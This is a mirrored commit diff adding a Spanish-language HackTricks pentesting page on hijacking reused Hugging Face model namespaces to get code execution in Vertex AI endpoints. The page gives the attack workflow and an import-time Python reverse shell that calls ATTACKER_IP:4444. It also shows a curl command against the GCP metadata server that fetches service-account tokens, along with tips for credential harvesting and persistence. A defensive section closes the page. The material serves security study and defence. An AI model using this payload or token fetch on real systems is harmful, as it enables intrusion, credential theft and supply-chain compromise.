gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-15 14:23:16 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/pentesting-cloud-methodology.md', 'src

Browse Source
This commit is contained in:
Translator
2025-09-29 21:16:50 +00:00
parent 645882f300
commit 6e74148fee
5 changed files with 274 additions and 54 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
View File

@@ -1,3 +1,9 @@
# GCP - Post Explotación
# GCP - Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
{{#ref}}
gcp-vertex-ai-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

113
src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md Normal file
View File

@@ -0,0 +1,113 @@
# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse
{{#include ../../../banners/hacktricks-training.md}}
## Escenario
- Vertex AI Model Garden permite el despliegue directo de muchos modelos de Hugging Face (HF).
- Los identificadores de modelo de HF son Author/ModelName. Si un author/org en HF es eliminado, el mismo nombre de author puede ser registrado de nuevo por cualquiera. Los atacantes pueden entonces crear un repo con el mismo ModelName en la ruta heredada.
- Pipelines, SDKs o catálogos cloud que obtienen por nombre únicamente (sin pinning/integrity) cargarán el repo controlado por el atacante. Cuando el modelo se despliega, loader code de ese repo puede ejecutarse dentro del contenedor del endpoint de Vertex AI, produciendo RCE con los permisos del endpoint.
Dos casos comunes de takeover en HF:
- Eliminación de propiedad: la ruta antigua devuelve 404 hasta que alguien vuelve a registrar al author y publica el mismo ModelName.
- Transferencia de propiedad: HF emite 307 redirects desde el antiguo Author/ModelName al nuevo owner mientras el antiguo author exista. Si el antiguo author es eliminado más tarde y re-registrado por un atacante, la cadena de redirects se rompe y el repo del atacante responde en la ruta heredada.
## Identificando espacios de nombres reutilizables (HF)
- Autor antiguo eliminado: la página del author devuelve 404; la ruta del model puede devolver 404 hasta el takeover.
- Modelos transferidos: la ruta del modelo antiguo emite 307 hacia el nuevo owner mientras el author antiguo exista. Si el author antiguo se elimina más tarde y se re-registra, la ruta heredada resolverá al repo del atacante.
Comprobaciones rápidas con curl:
```bash
# Check author/org existence
curl -I https://huggingface.co/<Author>
# 200 = exists, 404 = deleted/available
# Check old model path behavior
curl -I https://huggingface.co/<Author>/<ModelName>
# 307 = redirect to new owner (transfer case)
# 404 = missing (deletion case) until someone re-registers
```
## Flujo end-to-end Attack contra Vertex AI
1) Descubrir namespaces de modelos reutilizables que Model Garden lista como deployable:
- Encontrar modelos HF en Vertex AI Model Garden que aún aparecen como “verified deployable”.
- Verificar en HF si el autor original fue eliminado o si el modelo fue transferido y el autor antiguo fue eliminado después.
2) Volver a registrar al autor eliminado en HF y recrear el mismo ModelName.
3) Publicar un repo malicioso. Incluir código que se ejecute al cargar el modelo. Ejemplos que comúnmente se ejecutan durante la carga de modelos en HF:
- Efectos secundarios en __init__.py del repo
- Código personalizado modeling_*.py o de procesamiento referenciado por config/auto_map
- Rutas de código que requieren trust_remote_code=True en pipelines de Transformers
4) Un deployment de Vertex AI del legacy Author/ModelName ahora tira del repo del atacante. El loader se ejecuta dentro del contenedor del endpoint de Vertex AI.
5) El payload establece acceso desde el entorno del endpoint (RCE) con los permisos del endpoint.
Fragmento de payload de ejemplo ejecutado en import (solo para demostración):
```python
# Place in __init__.py or a module imported by the model loader
import os, socket, subprocess, threading
def _rs(host, port):
s = socket.socket(); s.connect((host, port))
for fd in (0,1,2):
try:
os.dup2(s.fileno(), fd)
except Exception:
pass
subprocess.call(["/bin/sh","-i"]) # Or python -c exec ...
if os.environ.get("VTX_AI","1") == "1":
threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
```
Notas
- Los loaders en entornos reales varían. Muchas integraciones Vertex AI HF clonan e importan módulos del repo referenciados por la configuración del modelo (p. ej., auto_map), lo que puede desencadenar ejecución de código. Algunos usos requieren trust_remote_code=True.
- El endpoint típicamente se ejecuta en un contenedor dedicado con alcance limitado, pero es un punto de apoyo inicial válido para acceso a datos y movimiento lateral en GCP.
## Consejos de posexplotación (Vertex AI Endpoint)
Una vez que el código se está ejecutando dentro del contenedor del endpoint, considera:
- Enumerar variables de entorno y metadata en busca de credenciales/tokens
- Acceder a almacenamiento adjunto o a artefactos del modelo montados
- Interactuar con Google APIs usando la identidad de la cuenta de servicio (Document AI, Storage, Pub/Sub, etc.)
- Persistencia en el artefacto del modelo si la plataforma vuelve a clonar el repo
Enumera la metadata de la instancia si es accesible (dependiente del contenedor):
```bash
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
## Orientación defensiva para usuarios de Vertex AI
- Anclar modelos por commit en los HF loaders para evitar reemplazos silenciosos:
```python
from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
```
- Espejar modelos HF verificados en un almacén/registro interno de artefactos de confianza y desplegar desde allí.
- Escanear continuamente las bases de código y las configs en busca de Author/ModelName codificados que hayan sido eliminados/transferidos; actualizar a los nuevos espacios de nombres o fijarlos a un commit.
- En Model Garden, verificar la procedencia del modelo y la existencia del autor antes del despliegue.
## Heurísticas de reconocimiento (HTTP)
- Autor eliminado: página del autor 404; ruta de modelo heredada 404 hasta la toma de control.
- Modelo transferido: la ruta heredada responde 307 al nuevo autor mientras el autor antiguo existe; si el autor antiguo se elimina y vuelve a registrarse más tarde, la ruta heredada sirve contenido del atacante.
```bash
curl -I https://huggingface.co/<OldAuthor>/<ModelName> | egrep "^HTTP|^location"
```
## Referencias cruzadas
- Consulte la metodología general y las notas sobre la cadena de suministro:
{{#ref}}
../../pentesting-cloud-methodology.md
{{#endref}}
## Referencias
- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/)
- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo)
{{#include ../../../banners/hacktricks-training.md}}